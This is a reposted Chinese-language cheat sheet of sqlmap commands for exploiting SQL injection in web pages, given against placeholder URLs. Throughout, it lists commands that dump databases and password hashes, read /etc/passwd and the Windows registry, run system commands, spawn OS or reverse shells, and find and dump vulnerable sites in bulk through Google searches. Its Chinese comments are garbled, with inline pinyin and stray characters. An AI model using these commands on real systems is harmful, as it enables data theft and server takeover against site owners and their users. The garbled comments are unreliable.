轉(zhuǎn)自
http://www.75271.com/1228.html
pythonsqlmap/sqlmap.py -u “http://url/news?id=1” –current-user #獲取當前用戶名稱
pythonsqlmap/sqlmap.py -u “http://www.xxoo.com/news?id=1” –current-db #獲取當前數(shù)據(jù)庫名稱
pythonsqlmap/sqlmap.py -u “http://www.xxoo.com/news?id=1” –tables -D “db_name” #列表名
python sqlmap/sqlmap.py -u “http://url/news?id=1” –columns -T “tablename” users-D “db_name” -v 0 #列字段
python sqlmap/sqlmap.py -u “http://url/news?id=1” –dump -C “column_name” -T “table_name” -D “db_name” -v 0 #獲取字段內(nèi)容
python sqlmap/sqlmap.py -u “http://url/news?id=1” –smart –level 3 –users # smart智能 level 執(zhí)行測試等級
python sqlmap/sqlmap.py -u “http://url/news?id=1” –dbms “Mysql” –users # dbms 指定數(shù)據(jù)庫類型
python sqlmap/sqlmap.py -u “http://url/news?id=1” –users #列數(shù)據(jù)庫用戶
python sqlmap/sqlmap.py -u “http://url/news?id=1” –dbs#列數(shù)據(jù)庫
python sqlmap/sqlmap.py -u “http://url/news?id=1” –passwords #數(shù)據(jù)庫用戶密碼
python sqlmap/sqlmap.py -u “http://url/news?id=1” –passwords-U root -v 0 #列出指定用戶數(shù)據(jù)庫密碼
python sqlmap/sqlmap.py -u “http://url/news?id=1” –dump -C “password,user,id” -T “tablename” -D “db_name” –start 1 –stop 20 #列出指定字段么夫,列出20條
python sqlmap/sqlmap.py -u “http://url/news?id=1” –dump-all -v 0 #列出所有數(shù)據(jù)庫所有表
python sqlmap/sqlmap.py -u “http://url/news?id=1” –privileges #查看權(quán)限
python sqlmap/sqlmap.py -u “http://url/news?id=1” –privileges -U root #查看指定用戶權(quán)限
python sqlmap/sqlmap.py -u “http://url/news?id=1” –is-dba -v 1 #是否是數(shù)據(jù)庫管理員
python sqlmap/sqlmap.py -u “http://url/news?id=1” –roles #枚舉數(shù)據(jù)庫用戶角色
python sqlmap/sqlmap.py -u “http://url/news?id=1” –udf-inject #導入用戶自定義函數(shù)(獲取系統(tǒng)權(quán)限O己铡)
python sqlmap/sqlmap.py -u “http://url/news?id=1” –dump-all –exclude-sysdbs -v 0 #列出當前庫所有表
python sqlmap/sqlmap.py -u “http://url/news?id=1” –union-cols #union 查詢表記錄
python sqlmap/sqlmap.py -u “http://url/news?id=1” –cookie “COOKIE_VALUE” #cookie注入
python sqlmap/sqlmap.py -u “http://url/news?id=1” -b #獲取banner信息
python sqlmap/sqlmap.py -u “http://url/news?id=1” –data “id=3” #post注入
python sqlmap/sqlmap.py -u “http://url/news?id=1” -v 1 -f #指紋判別數(shù)據(jù)庫類型
python sqlmap/sqlmap.py -u “http://url/news?id=1″ –proxy”http://127.0.0.1:8118” #代理注入
python sqlmap/sqlmap.py -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE” #指定關(guān)鍵詞
python sqlmap/sqlmap.py -u “http://url/news?id=1” –sql-shell #執(zhí)行指定sql命令
python sqlmap/sqlmap.py -u “http://url/news?id=1” –file /etc/passwd
python sqlmap/sqlmap.py -u “http://url/news?id=1” –os-cmd=whoami #執(zhí)行系統(tǒng)命令
python sqlmap/sqlmap.py -u “http://url/news?id=1” –os-shell #系統(tǒng)交互shell
python sqlmap/sqlmap.py -u “http://url/news?id=1” –os-pwn #反彈shell
python sqlmap/sqlmap.py -u “http://url/news?id=1” –reg-read #讀取win系統(tǒng)注冊表
python sqlmap/sqlmap.py -u “http://url/news?id=1” –dbs-o “sqlmap.log” #保存進度
python sqlmap/sqlmap.py -u “http://url/news?id=1” –dbs -o “sqlmap.log” –resume #恢復(fù)已保存進度sqlmap -g “google語法” –dump-all –batch #google搜索注入點自動 跑出所有字段攻擊實例
python sqlmap/sqlmap.py -u “http://url/news?id=1&Submit=Submit” –cookie=”PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –users –password